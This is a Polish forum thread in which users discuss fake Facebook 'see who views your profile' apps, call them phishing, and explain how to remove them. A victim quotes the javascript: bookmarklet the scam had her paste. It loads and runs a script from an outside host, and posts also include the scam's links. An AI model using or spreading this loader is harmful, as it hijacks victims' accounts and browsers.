Kto i ile razy podgląda was na Facebook - problem

(bartuśś) #1

Witam, ostatnio na facebook-u pojawił się program typu "See who views your profile " czyli robisz coś i widzisz kto ile razy podglądał i ile razy ty kogoś. Mam pytanie na czym to polega czy da radę jakoś wyzerować licznik? Nie chce by kilka pewnych osób widziało to ile razy u nich siedze... Chora akcja myślałem, że fb jest poważniejszy.

(Qba Lukaszczyk) #2

To jest w porządku. Co byś zrobił, jeśli okazałoby się, że wytropiłeś tak mordercę? Jeśli nie masz nic na sumieniu, to raczej nie masz nic do ukrycia.

(matty24) #3

Z ciekawości zrobiłem 4 razy sprawdzenie ile razy wchodzono na mój profil i za każdym razem był inny wynik. Aplikacje, z których korzystałem wymuszały tylko rejestracje na innych stronach.

Jak dla mnie to blef, chyba że trafiałem na złe aplikacje.

(Zulowski) #4

to jest jeden wielki świerzy robak, daje losowe wyniki, rozsyła się poprzez facebook chat, i sam zaprasza do wzięcia udziału w akcji... who viewed ...

phishing jak nic, a to że pogldądałeś koleżanke z gimnazjum nie wyjdzie na jaw...

PS:

Polecam szybko pousuwać uprawnienia nadane tej aplikacji.

(Yeti2704) #5

Ja powiem tak. Jakby coś takiego było możliwe to facebook sam by to oferował, a nie jakieś pseudo-aplikacje. I tyle.

(Karolina176) #6

a jak można zablokować ta "aplikację?"

(Karolina176) #7

no właśnie chodzi o te "jakoś" :wink:

(Karolina176) #8

http://see-profile.appspot.com/?77582

(Karolina176) #9

nic, na pewno wymyślą jak tego się pozbyć :slight_smile:

Ale dzięki za chęci :wink:

(Zolltarcrys) #10

Jak usunąć niechcianą aplikację na FB

Klikasz w górnym prawym rogu na Konto => Ustawienia Prywatności potem na dole masz "Aplikacje i witryny" klikasz na "Edytuj ustawienia", następnie "Usuń niechciane aplikacje lub aplikacje wysyłające spam" i tam usuwasz niechciane aplikację w tym także te.

(Zulowski) #11

Wow, ludzie faktycznie korzystają z tego facebooka nie zwracając uwagi na żadną ochrone danych, klikają w aplikacje które pobierają wszystko, a nawet potem nie wiedzą jak to zablokować, nie dziwie się że facebook jest aktualnie tyle warty :smiley:

Nawet Google nie stać by go odkupić ;p

(Błażej) #12

Stać stać, ale kto by chciał sprzedawać tak dobrze prosperującą marke? :wink:

Co do tej aplikacji to jest jedną z wielu które mogą nawet namieszać nam w kompie.

Cytuję:

(Krasnolka) #13

Witam,

niestety dałam się złapać, ok możecie pisać o ludzkiej głupocie itd. W tym akurat wypadku nie mam prawa się obrażać :wink:

ale napiszcie proszę jak się tego paskudztwa pozbyć!

chodzi o stronę ow.ly/4Jx7w

i skrypt: javascript:(a=(b=document).createElement('script')).src='//twojtest.pl/1.js?'+Math.random(),b.body.appendChild(a);void(0)

nie znam się na tym i naprawdę bardzo proszę o pomoc i konkretne odpowiedzi.

Pozdrawiam.